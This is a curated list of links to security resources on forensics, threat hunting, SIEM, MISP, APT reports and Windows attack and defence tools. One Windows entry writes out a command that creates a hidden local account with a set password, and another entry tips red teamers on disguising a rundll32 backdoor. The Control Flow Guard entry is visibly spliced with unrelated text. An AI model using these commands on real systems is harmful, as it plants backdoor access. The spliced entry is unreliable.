• FastIR Artifacts: Live forensic artifacts collector.
• MVT (Mobile Verification Toolkit) helps conducting forensics of mobile devices in order to find signs of a potential compromise.
• Cloud Forensics Triage Framework (CFTF)
• Forensic Investigation Cisco Stealthwatch at work
• Andriller CE (Community Edition): is software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices.
• Dshell is a network forensic analysis framework.
• exif-gps-tracer: A python script which allows you to parse GeoLocation data from your Image files stored in a dataset.It also produces output in CSV file and also in HTML Google Maps.
• Anti-Forensics:
  • ShredOS x86_64 - Disk Eraser: for all Intel 64 bit processors as well as processors from AMD and other vendors which make compatible 64 bit chips. ShredOS - Secure disk erasure/wipe.
• dfir_ntfs: An NTFS/FAT parser for digital forensics & incident response.
• MemProcFS: is an easy and convenient way of viewing physical memory as files in a virtual file system.
• LeechCore: Physical Memory Acquisition Library & The LeechAgent Remote Memory Acquisition Agent.
• PCILeech: Direct Memory Access (DMA) Attack Software.

PDF

• PDF Tools
• peepdf: Powerful Python tool to analyze PDF documents.
• How to Protect Files With Canary Tokens
• Attacks on PDF Certification
• PDF files
• How to remove malicious code from PDF files
• mu tools
• PDF forensics with Kali Linux : pdfid and pdfparser
• How can I extract a JavaScript from a PDF file with a command line tool?
• Insecure Features in PDFs. gs strings bug article
• Shadow Attacks … the smallest attack vector ever

Email Headers

• Configuring MTA-STS and TLS Reporting For Your Domain
• Google Admin Toolbox
• Azure Message Header Analyzer

Distros

• CAINE: Computer Aided INvestigative Environment. Is an Italian GNU/Linux live distribution created as a Digital Forensics project.
• e-Fense Helix 3
• black arch: An ArchLinux based distribution for penetration testers and security researchers.
• List of Live Distributions for Computer Forensics

Volatility

• volatility: An advanced memory forensics framework
• Volatility profiles for Linux and Mac OS X
• Building a profile for Volatility
• OROCHI: The Volatility Collaborative GUI
• AutoVolatility: Run several volatility plugins at the same time.
• Memory Forensics and Analysis Using Volatility
• Volatility, my own cheatsheet (Part 1): Image Identification
• First steps to volatile memory analysis
• MemLabs: Educational, CTF-styled labs for individuals interested in Memory Forensics.

Blue Team

• MITRE ATT&CK:
  • ATTACK-Tools: Utilities for MITRE™ ATT&CK
  • (pt-br)Analisando ameaças com Mitre ATT&CK Navigator
  • ATT&CK™ Navigator: Web app that provides basic navigation and annotation of ATT&CK matrices github.
  • Atomic Threat Coverage: Actionable analytics designed to combat threats based on MITRE's ATT&CK.
  • atomic-red-team: Small and highly portable detection tests based on MITRE's ATT&CK.
  • Welcome to Stealthbits Attack Catalog: Adversary techniques for credential theft and data compromise.
  • Splunk Attack Range: A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk.
  • attack-scripts: Scripts and a (future) library to improve users' interactions with the ATT&CK content.
  • Windows-specific MITRE ATT&CK techniques application control prevention assessment. This is a first attempt to assess the extent to which application control solutions would mitigate/prevent attack techniques. Note: this highly subjective assessment assumes a system that enforces an application control solution that at a minimum allows all Windows-signed code to execute and any line of business applications. It does not make assumptions about blocking built-in abusable applications.
  • Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9?
  • EU MITRE ATT&CK® Community pdfs
  • Mitre Att&ck Matri
  • Best Practices for MITRE ATT&CK® Mapping cisa page
• MITRE D3FEND.
• DeTTECT: Detect Tactics, Techniques & Combat Threats
• Sysmon:
  • Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were
  • Sysmon 12.0 — EventID 24: Sysmon 12 is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring.
  • SysmonX: An Augmented Drop-In Replacement of Sysmon.
  • SysmonSimulator: Sysmon event simulation utility which can be used to simulate the attacks to generate the Sysmon Event logs for testing the EDR detections and correlation rules by Blue teams.
• Awesome Honeypots: A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects.
• T-Pot: The All In One Honeypot Platform 
• Blue Team Fundamentals
• Blue Team fundamentals Part Two: Windows Processes.
• Sooty: The SOC Analysts all-in-one CLI tool to automate and speed up workflow.
• Your detections aren't working
• elastalert: Easy & Flexible Alerting With ElasticSearch
• Technical Approaches to Uncovering and Remediating Malicious Activity: Alert (AA20-245A).
• EVTX-ATTACK-SAMPLES: Windows Events Attack Samples slides
• Windows Advanced Audit Policy Map to Event IDs
• takuan is a system service that parses logs and dectects noisy attackers in order to build a blacklist database of known cyber offenders.,
• CobaltStrikeScan: Scan files or process memory for CobaltStrike beacons and parse their configuration.
• Hunting and detecting Cobalt Strike
• Cobalt Strike Beacon Analysis. python decoder: 1768k
• How to Design Detection Logic - Part 1
• MitigatingPass-the-Hashand OtherCredential Theft
• Evilginx-ing into the cloud: How we detected a red team attack in AWS
• Hidden Shares as bait more
• Blue Team 201: Detection — Where Do You Start?
• The DML model
• Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9?
• hashlookup CIRCL API. he full dataset of NSRL (National Software Reference Library) NIST is imported
• BaselineTraining: Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk.
• Practical Training for Blue Teamers
• BLUE TEAM LABS ONLINE
• Defining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis
• There are a lot of ways that folks distinguish between blue team roles. My focus is on investigative work and cognitive skills, so I divide those roles into the mental model shown in this diagram.

Threat Hunting

• Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
• Talos Blog || Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Adwind Dodges AV via DDE
• strelka: Scanning files at scale with Python and ZeroMQ
• Threat-Hunting: Personal compilation of APT malware from whitepaper releases, documents and own research
• ThreatHunter-Playbook: A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.
• HELK - The Hunting ELK: The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack.
• mordor: Re-play Adversarial Techniques.
• ioc_writer: Provide a python library that allows for basic creation and editing of OpenIOC objects.
• 3 of the main observed false positive ive learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 pref host for backdoors implemented as dll or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTPs traces). For #redteam u can blend in with mimicking case1 by naming ur module something like MSI*.tmp and using similar export fct name (dll path usually under c:\users* so no high priv needed).
• thethe: Simple, shareable, team-focused and expandable threat hunting environment. The Threat Hunting Environment
• Mordor PCAPs 📡:
  • Part 1: Capturing Network Packets from Windows Endpoints with Network Shell (Netsh) ⚔️ and Azure Network Watcher 🌩
• cyber-threat-response-clinic
• opencti: Open Cyber Threat Intelligence Platform
• securityonion: Security Onion 2.0 (Pre-release) - Linux distro for threat hunting, enterprise security monitoring, and log management
• TheHive: a Scalable, Open Source and Free Security Incident Response Platform
• TheHive4py: Python API Client for TheHive
• TheHiveIRPlaybook is a collection of TheHive case templates used for Incident Response
• Cortex-Analyzers: Cortex Analyzers Repository
• Nimbus Network Traffic Analyzer Augmented with our world-class threat intelligence.
• ja3 is a standard for creating SSL client fingerprints in an easy to produce and shareable way.
• Threat Hunting Process
• Threat Hunting Princiĺes
• TypeDB CTI: Open Source Threat Intelligence Platform
• Some repos from hunters-forge: API-To-Event, notebooks-forge, BloodHound Notebooks
• Yeti: Your Everyday Threat Intelligence
• Watcher: Open Source Cybersecurity Threat Hunting Platform. Developed with Django & React JS.
• Network Analysys:
  • traffic-analysis-workshop and wireshark-tutorial-decrypting-HTTPS-traffic
  • Wireshark Tutorial: Exporting Objects from a Pcap
  • Hex Packet Decoder: Hex Packet Decoder provides an HTTP API for you to parse network packets.
  • Packetor: Packetor is an online hex-dump packet analyzer / decoder.
  • Termshark: A terminal UI for tshark, inspired by Wireshark.
  • Wireshark Tutorial: Wireshark Workshop Videos Now Available
  • Wireshark Tutorial: Decrypting HTTPS Traffic
• Lookup Before You Go-Go...Hunting.
• Insider Threat Hunting and It's all in the numbers.
• Wazuh: is a free, open source and enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance. repo and ansible
• Hunting the Hunters - RCE in Covenant C2. PoC Video
• Passive SSH: Passive SSH is an open source framework composed of a scanner and server to store and lookup the SSH keys and fingerprints per host (IPv4/IPv6/onion). repo: passive-ssh
• EVTX-ATTACK-SAMPLES: Windows Events Attack Samples.
• Cyber Threat Intelligence
• Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement – Under the Radar
• D4 core: D4 core software (server and sample sensor client).
• A Top 10 Reading List if You’re Getting Started in Cyber Threat Intelligence
• CTI SquadGoals — Setting Requirements
• Threat Intelligence Naming Conventions: Threat Actors, & Other Ways of Tracking Threats
• BeaconEye: Hunts out CobaltStrike beacons and logs operator command output.
• SANS DShiled Datafeeds/API.
• The State of Threat Hunting and the Role of the Analyst
• Deepfence ThreatMapper: Identify vulnerabilities in running containers, images, hosts and repositories.
• SQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike
• All Access Pass: Five Trends with Initial Access Brokers. Initial Access Broker Landscape tt
  
• Paint it, Blue - Transitionin from CTI to HUNT: Ekoparty's BlueSpace Keynote November 2021. Shoutout to @plugxor Muchas Gracias!!!

MISP

• MISP (core software) - Open Source Threat Intelligence Platform (formely known as Malware Information Sharing Platform)
• MISP galaxy: Clusters and elements to attach to MISP events or attributes (like threat actors)
• DigitalSide Threat-Intel: Threat-Intel repository. API
• MISP-sizer: Sizing your MISP instance.
• MISP RPM: RPM packages for MISP
• ansible MISP: ansible role to setup MISP, Malware Information Sharing Platform & Threat Sharing.
• MISP CERT.br
• misp-warninglist: Warning lists to inform users of MISP about potential false-positives or other information in indicators
• MISP-maltego: Set of Maltego transforms to inferface with a MISP Threat Sharing instance, and also to explore the whole MITRE ATT&CK dataset.
• misp-modules: Modules for expansion services, import and export in MISP
• misp-taxonomies: Taxonomies used in MISP taxonomy system and can be used by other information sharing tool.
• PyMISP: Python library using the MISP Rest API
• MISP Concepts Cheat sheet
• CyCAT.org API services: API back-end server including crawlers.
• teslacoil.py: Monitors some log files and send new entries to syslog.
• Tutorials:
  • MISP Training - Youtube CIRCL
  • Youtube CIRCL
  • PyMISP and MISP Objects: a door to new opportunities
  • Additional MISP training materials (including slides, documentation and videos
  • Additional MISP training materials for law-enforcement agencies

APT - Advanced Persistent Threat

• APT33: More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting. Iranian hacking group built its own VPN network. APT33, the Iranian hacking group behind Shamoon, built its own VPN network.
• Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack
• Adversary Reports: The latest whitepapers, solution briefs, and datasheets from Dragos
• APT29 targets COVID-19 vaccine development
• What is APT28's Drovorub Malware?. FBI and NSA report
• Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS'​ Malware at Scale
• Tracking A Malware Campaign Through VT
• More Evidence of APT Hackers-for-Hire Used for Industrial Espionage
• APT41: US Charges Five Alleged Members of APT41 Group
• Analysis Report (AR20-268A)
• CYPRESS - Cyber Planning for Response and Recovery Study 2020 FERC, NERC and REs Report.
• CHIMBORAZO TA505
• Threat Group Cards: A Threat Actor Encyclopedia.
• Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. BADministration repo, symantec: Supply Chain Attack Targets SolarWinds Users. DGA domain names from SunBurst_DGA_Decode
• SolarWinds Security Advisory
• If you work in a SOC, print out this screenshot & pin it to a wall in your office
• Customer Guidance on Recent Nation-State Cyber Attacks
• Mapping out AridViper Infrastructure Using Augury’s Malware Module
• The Story of Jian: How APT31 Stole and Used an Unknown Equation Group 0-Day
• APT Encounters of the Third Kind
• Lazarus APT conceals malicious code within BMP image to drop its RAT - found new weaponized Word document
• distribute malicious zip with lnk? MSHTA > wscript > new LNK in startup > Reboot > MSHTA > wscript.
• Analysis of the Iranian cyber attack landscape
• Lemon Duck spreads its wings: Actors target Microsoft Exchange servers, incorporate new TTPs.
• threat actortouching an endpoint
• China’s PLA Unit 61419 Purchasing Foreign Antivirus Products, Likely for Exploitation
• APTnotes is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets. some tools
• The Active Adversary Playbook 2021: Attacker behaviors, tactics, techniques and procedures (TTPs).
• An Update on Industrialize the Tracking of Botnet Operations
• Patchwork APT caught in its own web
• Armagedon/Gamaredon
• North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign
• Update on cyber activity in Eastern Europe
• Cisco Talos shares insights related to recent cyber attack on Cisco

IoCs

• sophos labs IoCs: Sophos-originated indicators-of-compromise from published
• DailyIOC: IOC from articles, tweets for archives
• CVE-2020-1472 Zerologon IoCs
• iocs: Indicators from Unit 42 Public Reports
• Threat intelligence and threat detections: Threat intelligence and threat detection indicators (IOC, IOA).
• APT_Digital_Weapon: Indicators of compromise (IOCs) collected from public resources and categorized by Qi-AnXin.
• Ryuk Speed Run, 2 Hours to Ransom
• What did DeathStalker hide between two ferns?
• Yikes, Microsoft have signed multiple rootkits (which allow kernel drivers) and reach out to a remote IP
• Netfilter Rootkit Samples
• Feodo Tracker tracks certain families that are related or that evolved from Feodo
• There are evil packages on the npm registry that deploy XMRIG
• Emotet 2022 | epoch4 | 22.04.2022 |
• 238 Cobalt Strike stage 2 IP's, with 238 unique configurations, identified today. list
• malware-IoC: Bienvenidos al repositorio oficial de IoC del equipo de Cyber Threat intelligence de Entel Cyber Secure
• IcedID | 31.08.2022 | Campaign 2786525712

SIEM

• Sigma: Generic Signature Format for SIEM Systems
  • Suspicious Use of Procdump: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.
  • KrbRelayUp local privilege escalation.
• Events Heatmap
• RedELK: Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
• plaso: Super timeline all the things.
• Heatmaps Make Ops Better
• graylog-guide-snort: How to send structured Snort IDS alert logs into Graylog
• TALR: Threat Alert Logic Repository
• Auditing Continuously vs. Monitoring Continuously
• Logsspot: Logsspot is a project created to help cybersec folks understand what kind of information a security technology can present and how to use to improve detection and intelligence.
• Corsair: Python wrapper for some NSOC tools. Corsair aims to implement RESTFul wrappers for different tools commonly used by Network and Security Operations Centers (NSOC).
• Scalable Logging and Tracking
• Logs were our lifeblood. Now they're our liability.
• Using Flume to Collect Apache 2 Web Server Logs
• spectx: Instantly parse and investigate raw log files
• The log/event processing pipeline you can't have
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Here's a Splunk way to score behaviors that are derived from detections.
• ProductLoggingTracker: Simple list of product types that InfoSec professionals may want to collect into a central repository
• The Log Pile: scripts to help witch log to save.
• Part of my role is ensuring we're not EDR-centric. We have to be able to detect threats w/o OS-level viz (e.g., control plane only), using auth/net events, or whatever data is in a SIEM
• LORG: Apache Logfile Security Analyzer.
• Shipping to Elasticsearch Microsoft DNS Logs
• Windows 10 ETW Events: Events from all manifest-based and mof-based ETW providers across Windows 10 versions.
• Log Parser Lizard: provides a modern graphical user interface to Microsoft Log Parser 2.2 for analyzing logs using SQL queries.
• Fluentd: Unified Logging Layer (project under CNCF)
• Laurel: Transform Linux Audit logs for SIEM usage
• Matano: The open-source security lake platform for AWS.

Browsers

• SOK: On the Analysis of Web Browser Security
• Bypassing Browser Security Warnings with Pseudo Password Fields
• The 9 Lives of Bleichenbacher's CAT: New Cache ATtacks on TLS Implementations
• How To Blow Your Online Cover With URL Previews
• Nefarious LinkedIn: A look at how LinkedIn exfiltrates extension data from your browser.
• Lightnion: A light version of Tor portable to the browser.
• Puppeteer: Headless Chrome Node API. site
• uBlock Origin: An efficient blocker for Chromium and Firefox. Fast and lean.
• autochrome: This tool downloads, installs, and configures a shiny new copy of Chromium.
• BROWSERGAP:Browse Anything Securely, Browse the web without the web browsing you.
• browsergap.ce: Simple Isolated Remote Browsers, Open Source
• Crash Chrome.
• Firefox: How a website could steal all your cookies
• Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique

Browsers Addons

• Addons for Firefox:
• LinkGopher
• (Image) WebDeveloper
• (Image) IPvFoo
• DownthemAll
• SixorNot
• Uppity
• Cliget
• (Image) URLs List
• Link Redirect Trace
• Tamper Data for FF Quantum
• BuiltWith
• Wappalyzer
• Exif Viewer
• Anti-Grabify Browser Extension

Operating Systems

• bochspwn-reloaded: A Bochs-based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3
• drltrace: Drltrace is a library calls tracer for Windows and Linux applications.
• shellz: is a small utility to track and control your ssh, telnet, web and custom shells.
• CLIP OS: Open Source secured operating system by Agence nationale de la sécurité des systèmes d'information
• How to Get Started With VMware vSphere Security « vMiss.net
• routeros: RouterOS Bug Hunt Materials Presented at Derbycon 2018
• Awesome-Study-Resources-for-Kernel-Hacking: Kernel Hacking study materials collection
• Skadi: Collect, Process, and Hunt with host based data from MacOS, Windows, and Linux.
• taintgrind:A taint-tracking plugin for the Valgrind memory checking tool. gcc + LD_PRELOAD + taintgrind + graphviz
• UPX is a free, portable, extendable, high-performance executable packer for several executable formats. repo
• Mainframe:
  • MF Sniffer: Mainframe TN3270 unencrypted TSO session user ID and password sniffer.
• magic-trace: collects and displays high-resolution traces of what a process is doing.

UEFI

• uefi-jitfuck: A JIT compiler for Brainfuck running on x86_64 UEFI
• Secure Boot in the Era of the T2: Continuing our series on Apple’s new T2 platform and examining the role it plays in Apple’s vision of Secure Boot.
• PSPTool: Display, extract, and manipulate PSP firmware inside UEFI images
• Project Mu: is a modular adaptation of TianoCore's edk2 tuned for building modern devices using a scalable, maintainable, and reusable pattern. github repo
• Force firmware code to be measured and attested by Secure Launch on Windows 10

Windows

• Awesome Advanced Windows Exploitation References
• windows kernel security development
• A process scanner detecting and dumping hollowed PE modules.
• dll_to_exe: Converts a DLL into EXE
• pe-sieve: Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).
• A PowerShell utility to dynamically uncover a DCShadow attack
• Security Research from the Microsoft Security Response Center (MSRC)
• DCSYNCMonitor
• Total Meltdown?
• DetectionLab: Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. Post here
• powerlessshell: Run PowerShell command without invoking powershell.exe.
• internal-monologue: Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
• Robber is open source tool for finding executables prone to DLL hijacking
• Remote-Desktop-Caching
• LogRM: LogRM is a post exploitation powershell script which it uses windows event logs to gather information abou
• InvisiblePersistence: Persisting in the Windows registry "invisibly"
• Dynamic Tracing in Windows 10 19H1
• Capturing NetNTLM Hashes with Office [DOT] XML Documents
• LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
• Passing-the-Hash to NTLM Authenticated Web Applications
• Detours: Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form.
• r0ak: r0ak ("roak") is the Ring 0 Army Knife -- A Command Line Utility To Read/Write/Execute Ring Zero on for Windows 10 Systems.
• SpeculationControl: SpeculationControl is a PowerShell script that summarizes the state of configurable Windows mitigations for various speculative execution side channel vulnerabilities, such as CVE-2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown).
• Reverse Engineering Windows Defender (by Alexei Bulazel): pdf and videos
  • Ground Zero: Part 2-2 XOR encryption – Windows x64
  • Ground Zero: Part 2-3 Building Cracked Binaries – Windows x64
• EKFiddle: A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.
• Windows Command-Line: Introducing the Windows Pseudo Console (ConPTY) – Windows Command Line Tools For Developers
• MSconsole: Windows Console Tools
• PowerShell Remoting by Stephanos Constantinou Blog
• DbgShell: A PowerShell front-end for the Windows debugger engine.
• Windows Incident Response: Updates
• Win 10 related research
  • Event log 'Keywords' p1
  • Windows 10 - Notifications
• UAC bypass using CreateNewLink COM interface
• Privilege Escalation:
  • Windows Privilege Escalation (Unquoted Path Service)
  • WinPwnage: Elevate, UAC bypass, privilege escalation, dll hijack techniques
  • Securing SCOM in a Privilege Tiered Access Model–Part 1
  • Windows Privilege Escalation Guide: This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect.
  • An introduction to privileged file operation abuse on Windows: This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs.
  • Control Flow Guard Teleportation: The idea that I tried in 2018 was to use Control Flow Guard (CFG) to regenerate my code in a special memory region. CFG is a security feature that aims to mitigate the redirection of the execution flow, for example, by checking if the target address for an indirect call is valid function. [demo](https:/The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use.nprivileged window could just send commands to a highly privileged window, and that’s what UIPI, User Interface Privilege Isolation, prevents. This isn’t a story about UIPI, but it is how it began. ctftool - Interactive CTF Exploration Tool
  • PsExec Local Privilege Escalation
  • SweetPotato: Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019.
  • Windows Exploit Suggester - Next Generation (WES-NG).
• Remote NTLM relaying through meterpreter on Windows port 445, DivertTCPconn: A TCP packet diverter for Windows platform.
• Analyzing obfuscated powershell with shellcode, Empire is a PowerShell and Python post-exploitation agent.. OVERVIEW OF EMPIRE 3.4 FEATURES
• Empire 4.2 was just finalized over the weekend and we are excited to share some of the new features.
• relayer: SMB Relay Attack Script
• Ps1jacker: Ps1jacker is a tool for generating COM Hijacking payload.
• python-dotnet-binaryformat: Pure Python parser for data encoded by .NET's BinaryFormatter
• Firework: Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process.
• hUACME: Defeating Windows User Account Control
• SysmonTools: Utilities for Sysmon
• sysmon-config: Sysmon configuration file template with default high-quality event tracing.
• Sysmon: how to set up, update and use?
• Panache_Sysmon: Just another sysmon config
• Hiding malware in Windows – The basics of code injection
• Inveigh: Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. announcement
• Bypassing AppLocker Custom Rules: 0x09AL Security blog
• SpecuCheck: SpecuCheck is a Windows utility for checking the state of the software mitigations against CVE-2017-5754 (Meltdown) and hardware mitigations against CVE-2017-5715 (Spectre)
• RID-Hijacking: Windows RID Hijacking persistence technique
• WSL Reloaded
• Windows oneliners to download remote payload and execute arbitrary code
• reflectivepotato: MSFRottenPotato built as a Reflective DLL. Work in progress.
• randomrepo: Repo for random stuff
• Microsoft Windows win32k.sys: Invalid Pointer Vulnerability (MSRC Case 48212) - Security Research
• rdpy: Remote Desktop Protocol in Twisted Python
• SharpWeb: NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge.
• reconerator: C# Targeted Attack Reconnissance Tools
• ManbagedInjection: A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention pre-knowledge
• InveighZero: C# LLMNR/NBNS spoofer
• DanderSpritz Lab: A fully functional DanderSpritz lab in 2 commands.
• Lateral movement using URL Protocol gist
• HiddenPowerShell: This project was created to explore the various evasion techniques involving PowerShell: Amsi, ScriptBlockLogging, Constrained Language Mode and AppLocker.
• One Windows Kernel.
• The Dog Whisperer’s Handbook: This PDF is a collection of bits and pieces that were scattered across the web and that I collected in the last two years while writing the CypherDog PowerShell module.
• Attack and Defend microsoft enhanced security administrative environment
• raw-socket-snifferr: Packet capture on Windows without a kernel drive
• DCOMrade: Powershell script for enumerating vulnerable DCOM Applications
• shed: .NET runtime inspector
• Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host
• How to steal NTLMv2 hashes using file download vulnerability in web application
• NTLMRelay2Self: An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav).
• Simpleator: ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that lever
• WinDbg-Samples: Sample extensions, scripts, and API uses for WinDbg.
• OrgKit: Provision a brand-new company with proper defaults in Windows, Offic365, and Azure
• Leveraging WSUS.
• windowsblindread: A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
• azucar: Security auditing tool for Azure environments
• volatility-wnf: Browse and dump Windows Notification Facilities.
• Yet another sdclt UAC bypass: As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window.
• awesome-windows-kernel-security-development: windows kernel security development.
• ALPC-BypassUAC: UAC Bypass with mmc via alpc.
• ManagedPasswordFilter: Windows Password Filter that uses managed code internally
• DeviceGuardBypasses: A repository of some of my Windows 10 Device Guard Bypasses
• rifiuti2: Windows Recycle Bin analyser
• Reversing and Patching .NET Binaries with Embedded References
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Windows PowerShell Remoting: Host Based Investigation and Containment Techniques.
• .NET Manifesto: win friends and influence the loader. malwariaLabs. slides from derbycon 2019
• Bypassing Windows User Account Control
• symboliclink-testing-tools: This is a small suite of tools to test various symbolic link types of Windows.
• Run PowerShell without Powershell.exe — Best tools & techniques
• Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor
• Privileged Access Workstations
• Activation Contexts — A Love Story. Windows loads a version of the Microsoft.Windows.SystemCompatible assembly manifest into every process. Tampering with it lets you inject DLL side-loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise.
• Evil-WinRM: The ultimate WinRM shell for hacking/pentesting
• Understanding WdBoot (Windows Defender ELAM)
• SharpHide: Tool to create hidden registry keys.
• Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account
• Deploying honeytokens in Active Directory & How to trick attackers with deceptive BloodHound paths
• CrackMapExec module to set as "owned" on BloodHound every target owned by the attacker
• Configuring Additional LSA Protection
• Getting Malicious Office Documents to Fire with Protected View Enable
• The Internals of AppLocker:
  • Part 1: Overview and Setup
  • Part 2: Blocking Process Creation
  • Part 3: Access Tokens and Access Checking
  • Part 4: Blocking DLL Loading
• COM-Code-Helper: Two IDAPython Scripts help you to reconstruct Microsoft COM (Component Object Model) Code.
• Scylla: Imports Reconstructor
• A Speed-Research on Windows Explorer's Auto-Completion
• sysmon-config: A Sysmon configuration file for everybody to fork
• Windows Event Forwarding Guidance
• Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI
• Microsoft Defender Advanced Threat Protection (ATP)
• BeaKer - Beaconing Kibana Executable Report: Aggregates Sysmon Network Events With Elasticsearch and Kibana
• python-ntlm: Automatically exported from code.google.com/p/python-ntlm
• Logging Made Easy: is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks.
• lme: Logging Made Easy, is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks.
• SharePoint and Pwn :: Remote Code Execution Against SharePoint Server Abusing DataSet
• Secure DevOps Kit for Azure (AzSK)
• Windows Debugger API — The End of Versioned Structures
• DisableAntiSpyware
• Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter?
• DefendTheFlag: Get started fast with a built out lab, built from scratch via Azure Resource Manager (ARM) and Desired State Configuration (DSC), to test out Microsoft's security products.
• DumpReparsePoints: This is a simple tool to dump all the reparse points on an NTFS volume.
• Certify SSL Manager: manage free https certificates for IIS
• Bypassing Credential Guard: Wdigest can be enabled on a system with Credential Guard by patching the values of g_fParameter_useLogonCredential and g_IsCredGuardEnabled in memory.
• WSUS Attacks Part 1: Introducing PyWSUS
• This is about adding a $ account and have it not show up in net users.: net user $ LetMeIn123! /add /active:yes
• LECmd: Lnk Explorer Command line edition!!
• PECmd: Prefetch Explorer Command Line.
• Five PE Analysis Tools Worth Looking At
  • pestudio: The goal of pestudio is to spot suspicious artifacts within executable files in order to ease and accelerate Malware Initial Assessment and is used by Computer Emergency Response Teams and Labs worldwide.
  • PEview version
  • FileAlyzer
  • NTCore Explorer Suite
  • exeinfo github
• MitigationFlagsCliTool: Prints mitigation policy information for processes in a dump file.
• Windows 10 System Programming book samples Windows Internals Book 7th Edition Tools, The Windows Kernel Programming book samples
• DriverMon: Monitor activity of any driver
• Windows AllTools: All reasonably stable tools
• Sysmon Internals: From File Delete Event to Kernel Code Execution
• Windows-driver-samples: This repo contains driver samples prepared for use with Microsoft Visual Studio and the Windows Driver Kit (WDK). It contains both Universal Windows Driver and desktop-only driver samples.
• procfilter: A YARA-integrated process denial framework for Windows
• Winerror: Get Windows Programming error codes descriptions using the command line.
• ProcessHacker: The Minimalistic x86/x64 API Hooking Library for Windows
• PVE CA Cert List Utility: Windows 2003/2008 Certificate Authority Certificate List Utility for pending requests and about-to-expire certificates
• Release the Kraken: Fileless injection into Windows Error Reporting service
• MinHook: The Minimalistic x86/x64 API Hooking Library for Windows.
• Windows security baselines
• TokenPlayer: Manipulating and Abusing Windows Access Tokens.
• The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment
• ntlmscan: scan for NTLM directories.
• Smbtouch-Scanner: Automatically scan the inner network to detect whether they are vulnerable.
• Block process creations originating from PSExec and WMI commands
• VDM:Vulnerable Driver Manipulation. physmem_drivers: A collection of various vulnerable (mostly physical memory exposing) drivers.
• Source code for HppDLL: local password dumping using MsvpPasswordValidate hooks
• SharpMapExec: A sharpen version of CrackMapExec. This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.
• Fibratus: A modern tool for the Windows kernel exploration and observability.
• Ultimate WDAC Bypass List: A centralized resource for previously documented WDAC bypass techniques
• Live Patching Windows API Calls Using PowerShell
• fibratus: A modern tool for the Windows kernel exploration and observability
• Adventures in Dynamic Evasion
